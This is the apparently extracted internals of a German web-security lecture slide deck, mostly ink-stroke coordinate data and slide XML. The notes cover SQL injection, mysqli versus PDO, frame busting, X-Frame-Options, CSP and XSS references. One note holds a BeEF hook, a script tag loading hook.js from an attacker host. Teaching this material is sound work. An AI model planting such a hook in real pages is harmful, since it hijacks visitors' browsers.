0 0,-1 1-1,0-1 1,1 0 0,-1 1 0,1-1-1,-1 0 1,1 2 73,0 0 1,0 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 3-1,-3 15-2311,0-14-2338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10 200,'21'-9'14005,"-20"17"-9262,-1-7-4580,1-1-171,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0 0 1,0-1-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,1 14-3621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14 640,'-7'-13'9977,"14"32"-5314,3 18-2543,-10-10-1444,-1-17-517,0 0-1,1-1 1,1 1 0,0 0-1,0-1 1,0 1-1,6 16 1,-5-22-120,-1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1-1 0,0 8 1,0-7-17,-1-1 1,2 0-1,-1 1 1,0-1 0,1 1-1,0-1 1,2 7-1,8 26 75,-9-20-37,-3-16-101,1-1-1,0 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 0 1,1 1-1,-1-1 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-11-33-11501,10 17 8094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74 532,'7'-12'7158,"9"-13"-4077,-10 21-2673,-1 0-1,1 0 1,0 1 0,0-1 0,0 1-1,0 1 1,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1 0 0,7 0 0,-5 1-534,0 1 1,0 1 0,0-1 0,0 1 0,0 1 0,-1-1-1,1 1 1,-1 1 0,0 0 0,0 0 0,0 1 0,0 0 0,9 7-1,-15-3-1386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26 888,'0'0'6156,"41"-18"-387,-35 16-5639,0 1 0,0-1 1,0 1-1,0 1 0,0-1 0,0 1 0,10 0 0,-10 0-79,82 7-470,-34-2-5526,-45 0 2608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54 1604,'-7'13'4309,"8"-13"-4225,-1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 1,0 0-1,0 0 0,2 0 1386,41 0 2433,-27 0-3706,1-1-1,0-1 0,0 0 0,-1-1 1,1-1-1,28-11 0,0-5-3206,0-4-5194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2 964,'-9'-1'12594,"7"2"-12562,0 3 102,1-1 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,1-1 0,-2 0 0,1 0 0,-4 3 0,-19 15 183,-7 11-177,26-25-160,0 0-1,1 0 1,0 0 0,0 1 0,-6 9 0,8-11-171,-1 0 0,1 0-1,-1-1 1,0 1 0,-1-1-1,1 0 1,-1-1 0,1 1-1,-1-1 1,-8 3 0,8-4-698,0 1 0,1-1 0,-1 0 0,0-1 0,0 0 0,-11 1 0,16-2 704,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1-1 0,1 1-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-2 0,0-8-1509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21 1392,'-1'-1'193,"1"0"0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0 0 1,1-1-1,-1 1 0,1-1 0,-1 1 0,1 0 0,0-1 0,1 0-84,-2 1 119,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 1,1 0-1,-1 1 0,1 0 0,16 18 2139,10 25-1071,5 10-774,-30-51-508,0 0-1,-1 0 1,1 0 0,0 0-1,0-1 1,0 1 0,1 0-1,3 3 1,16 20 63,-21-23-75,1 0 0,1-1-1,-1 1 1,0-1 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,6 2 1,20 16-324,-27-19 104,0 0 1,0 1-1,0-1 0,-1 0 0,1 0 0,1 0 0,-1 0 1,0-1-1,0 1 0,0-1 0,0 1 0,0-1 0,1 0 1,-1 0-1,4 0 0,22-6-9136,-19 1 6387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0 161 1724,'1'-1'385,"-1"-1"1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 0,0 1 1,44-15 2062,-4 1-1947,-24 5-463,-13 7-28,0 0 1,0 0-1,0-1 1,-1 0-1,1 0 1,-1 0-1,6-5 1,-9 6 28,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,-3-3 0,1 1 605,2 3-605,1 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,-1 1 0,-3 2 18,-1-1 0,0 1 0,1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,1 1 1,-1-1-1,1 1 0,-4 5 0,-26 25 384,32-33-413,-1 0 0,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,1 0 0,-1 0 0,1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,3 5-1,-1-3-34,0-1 0,0 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,1-1 1,-1 0-1,1 1 0,-1-1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-2 0,0 1 0,10 2 0,22 4-155,-24-5-286,1 0 0,-1-1 0,18 1 0,-9-2-1766,-20 0 1551,1-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,4-2-1,5-3-2341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17 88,'-3'-11'7931,"-3"10"-7361,-2-1 1915,7 1-2394,1 1-1,-1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,1 0 1,-1 0-1,1 1 0,-1-1 1,0 1-1,-14 3 773,12-4-789,1 1 1,0-1-1,0 0 1,0 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,-2 2-1,-25 20 598,14-12-449,0 1-1,1 0 1,1 1 0,0 1 0,0 0 0,1 0 0,1 2-1,-14 24 1,24-38-214,1 0 0,-1 0 0,1 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,1 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,1 0-1,0 1 1,1 1-6,-1 0 1,1-1-1,0 1 0,0-1 0,1 1 0,-1-1 0,1-1 1,4 5-1,-2-5-71,0 1 0,1-1 1,-1 0-1,0 0 0,1-1 1,0 1-1,-1-2 0,1 1 1,0-1-1,-1 0 0,1 0 1,0-1-1,-1 1 0,8-3 1,42-13-3823,-1-5-4437,-34 10 5209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8 332,'-1'-6'14111,"3"4"-13601,6 8-1696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2 300,'0'-1'7594,"0"4"-7014,14 41 1404,-5-22-1328,-4-5-209,0 1-1,-2 0 0,0-1 0,1 27 0,7 48 903,0-26-853,-11 42-204,0-107-311,-2-13-7239,-5 5 4566,5-4-205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16,'0'-4'528,"1"1"1,-1-1-1,1 1 1,-1-1-1,1 1 1,0 0-1,1-1 0,-1 1 1,0 0-1,1 0 1,0 0-1,0 0 0,4-5 1,-1 2-10,0 0 0,1 1 1,-1 0-1,1 0 0,1 1 0,6-4 0,9-4 470,1 1-1,43-13 0,-62 22-856,7-1-41,0-1 0,0 2-1,0-1 1,0 2 0,1-1-1,-1 2 1,0-1 0,1 2-1,-1-1 1,1 2 0,-1-1-1,0 1 1,0 1 0,0 0-1,0 1 1,0 0 0,-1 1-1,0 0 1,19 12 0,-28-15-56,1 0-1,0 0 1,-1 0 0,1 0-1,-1 1 1,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,-1 0 0,0-1-1,-1 5 1,-6 12 296,-7 6-58,3-14-215,1 0 1,-2-1-1,1 0 1,-1-1 0,-1-1-1,0 0 1,-15 7 0,-13 7-98,23-11-73,-18 7-228,2-4-201,22-2-1552,7 5-4617,23-17 2411,-14 1 3463,10 4-1839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22 135 372,'11'-23'10617,"-2"11"-10523,-8 10 988,-5-14 1359,6 14-2072,-1 2-505,-10 18 858,7-16-719,1-2-3,1 0 0,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0-1,0 1 1,0-1 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,1 0-1,-3 4 23,-1 0-13,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 1,1 1-1,-2 8 0,3-4-33,2 33-10,-1-42 33,-1 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,3 1 0,9 11-17,-12-11 17,-1-1-1,1 1 1,0-1-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,4 1 1,15 6 2,-14-5 1,0 0 1,0-1-1,0 0 1,0 0 0,1 0-1,-1-1 1,0 0-1,1 0 1,-1 0 0,1-1-1,12-1 1,-13 1-2,0-1 0,1 0 0,-1-1-1,0 1 1,0-1 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1-1-1,6-8 1,-6 6-4,0 0 0,0-1-1,-1 0 1,0 0-1,0-1 1,3-9-1,1-4-3,-6 17 8,0 1 0,0 0 0,-1-1 0,0 1 1,0-1-1,0 1 0,1-10 0,-2 8 1,0 1 4,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,-1 0-1,1 0 0,-3-8 1,0 0 11,4 13-16,0-1 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1 0-1,1-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,-1 0 1,1-1 0,-1 1-1,1 0 1,-1 0 0,0-1-1,-17-10 106,16 8-82,-1 1 0,1 0 0,-1 1 1,0-1-1,1 0 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,-2 0 0,0 0-36,-1 1-1,1 0 1,0 0 0,0 0-1,0 1 1,0 0 0,1 0-1,-1 1 1,1-1 0,0 1-1,0 0 1,0 1 0,1-1-1,-1 1 1,1 0 0,0 0-1,0 0 1,1 1 0,0-1-1,-6 13 1,-9 24-1671,-3-1-3785,19-24 281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44 412,'0'0'581,"10"18"2334,-9-16-2804,-1-1 1,1 1 0,-1 0-1,1 0 1,0 0 0,-1-1-1,1 1 1,0 0-1,0-1 1,0 1 0,1-1-1,-1 1 1,0-1 0,0 1-1,1-1 1,-1 0 0,3 2-1,-2-3 867,-2 0-938,1 0 1,-1 0-1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 0,11-40 1096,10 9-850,-21 32-278,0 0 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 2 123,-6-4 484,15 33 345,2 30-786,0 5 289,14 32 445,-23-92-952,16 39 326,-17-43-341,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0 0 0,-1-1 0,3 1 0,-2 4-1843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28,'0'0'1227,"11"18"2886,-9-12-3822,0-1 0,1 1 0,0-1 1,0 1-1,0-1 0,4 5 0,0 1 64,6 11 213,-8-11-413,1-1 0,0 0-1,0 0 1,1 0 0,1-1-1,-1 0 1,2 0 0,-1-1 0,14 11-1,-20-19-211,-1 1 0,1-1 1,-1 0-1,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,1-2 0,21-26-2791,-2-15-308,-12 27 1987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8 204,'0'-1'-110,"18"-6"4636,-11 8-898,-12 8-1336,-1 0-1702,1 0-1,0 0 1,0 1-1,1 0 1,1 0-1,0 0 1,-3 10-1,-9 31 463,-21 68 220,18-51-764,-24 119 722,40-154-1108,2-31-134,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 1,0-1-1,-1 0 0,0 1 0,0-1 0,1 0 1,-1 1-1,-1-1 0,0 3 0,1-7-576,0 1-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1 0,1 1-1,-1 0 1,1-1-1,-1 1 1,2-2 0,7-14-2963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0 756,'0'0'793,"22"5"5775,-33 28-1917,10-28-4184,0 1-1,-1 0 1,0-1 0,0 1 0,0-1-1,-6 10 1,-8 20 160,-24 56 115,34-72-564,1 0 0,1 1 1,-4 37-1,19 11 205,-11-61-378,1 1-1,0-1 1,1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,0-1 1,0 1-1,1-1 1,0 1-1,0-1 1,0 0-1,1-1 1,0 1-1,0-1 1,0 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,1 0 1,-1 0-1,1-1 1,-1 0-1,8 2 1,-12-5-228,1 1 1,-1 0-1,0-1 0,0 1 1,0-1-1,0 0 1,1 1-1,-1-1 1,0 0-1,0-1 1,0 1-1,5-1 0,1-8-3742,-5-11-3326,-3 9 4187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54 644,'4'27'4892,"-4"-24"-4729,1 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,1 0 1,3 4 0,14 16 422,-17-19-560,0 0 1,0 0-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,4 1-1,-1-2 30,0 0-1,0 0 1,0 0-1,0-1 0,0 0 1,1 0-1,-1-1 1,0 0-1,0 0 0,0-1 1,0 0-1,0 0 1,0 0-1,-1-1 0,1 0 1,-1 0-1,0-1 0,10-7 1,-12 7 18,1-1 0,-1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 0,0 0 0,2-12 0,-4 16 42,0-1-1,-1 0 1,1 1-1,-1-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,0 1 1,0-1 0,-1 1-1,1 0 1,0-1-1,-1 1 1,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1-1,0 0 1,-1 1 0,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1 0-1,-1 0 1,0 0-1,1 0 1,-4 0 0,-4 0 20,1 0 0,0 1 0,-1 0 0,1 1 0,0 0 0,0 0 0,0 1 1,0 0-1,-9 5 0,14-6-168,-1 1 0,1-1 0,-1 1-1,1 0 1,0 1 0,0-1 0,0 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1-1,-1-1 1,-3 9 0,1 25-6199,16-37 1859,-1-1 1841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47 608,'10'-12'3090,"-9"11"-2979,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 1 0,1-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1-1 0,3-4 281,2-6 7425,-6 13-7742,0-1-1,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 1-1,0-1 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,-1-1 1,1 1-1,0 0 1,-1 0-1,0 0 1,-12 17 388,12-17-387,-14 3-5,14-3-53,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-14,-1 0 1,0 0 0,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1 0-1,0 0 1,-22 10 32,23-9-27,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0-1,-1 0 1,1 0 0,-1 0-1,0 1 1,0-1 0,1 0-1,-1 0 1,0 0 0,-2 1-1,-7 64-11,10-64 2,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0 0 0,0 0 1,-1-1-1,1 1 0,1 0 1,-1-1-1,0 1 0,0-1 0,3 3 1,0 1-16,-1-2 12,0 0-1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 0 1,0 0-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,6-6 0,-5 4-5,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0-10 0,-1 12 7,0 1 1,-1-1-1,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-5-2 1,3 2-5,-1-1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,1 0 0,-1 0-1,-8 2 1,5 1-154,0 1 0,0 0 0,0 0 0,1 0 0,0 1-1,-9 8 1,-23 20-3573,21-18-432,6-2-1887,3-7 2973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18 756,'0'-17'6617,"0"28"-5005,0-6-1264,-1 0 1,1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0-1 1,0 1-1,0 0 0,3 5 1,1 10 1000,1-2-313,-5-17-926,0 1-1,1 0 0,-1 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 3 0,5 16 300,1-9-256,8 24 106,-13-34-260,-1 0-1,1 0 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0-1 1,0 1-1,1 0 1,-1 0-1,1 0 0,-1-1 1,4 3-1,-3 5-1941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19 756,'-2'-19'9461,"-23"27"-3604,20-5-5562,0 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-5 6 0,5-5-269,1-1 1,-1 1 0,1 0 0,0 0-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 1 0,1-1 0,-1 1-1,0 7 1,-9 35 356,11-44-383,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,5 2-1,0 1 21,1-2-1,-1 1 1,1-1-1,0 0 0,0 0 1,1-1-1,9 2 0,-14-4-33,-1 0 0,1-1 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0-1,-1-1 1,1 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 0 0,0 0 0,0 0-1,0 0 1,4-5 0,3-3-235,-1-1-1,0 0 1,-1 0 0,10-19 0,-17 28 218,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 1,-1-2-1,-22-38-58,17 31 82,5 8 17,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,-7-4 0,-20 2 259,26 3-265,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-4 2 0,-38 16-2412,3-2-4956,39-16 6939,0-2-715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0 620,'0'0'1518,"2"11"624,-1-9-1870,1 0 1,-1 0-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 0-1,-2 5 1,2 8 1888,11 16 1158,-12 6-1277,0-19-1696,1 0 0,1 0 0,0 0 1,8 36-1,2 12-94,-3-38-206,5 10-16,-5-23-39,-8-14-60,0 0-1,1 0 1,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,2 1 0,-1-1-1338,-23-12-13487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mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> eigentlich recht umständlich. Bei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> einfacher. Und bei anderen Sprachen erst recht einfacher.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32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: darkside-beef.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hook-url: &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://darkside-beef.me:3000/hook.js"&gt;&lt;/script&gt;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4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3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04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92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Clientseitiges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Frame Busting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empfehlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, da es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browserspezifisch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umgangen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allow-from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browser!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X-Frame-Options und CSP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04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ORMs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aufpassen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erst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vulnerable Statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reinschreibt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PINGO QUIZ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>NoSQL, XML/XPATH , SMTP, LDAP, OS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, 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0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https://portswigger.net/web-security/cross-site-scripting/dom-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>https://owasp.org/www-community/Types_of_Cross-Site_Scripting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57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24.11.2020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7.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1101.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1120.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink458.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink498.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink582.xml"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink593.xml"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink614.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId191" 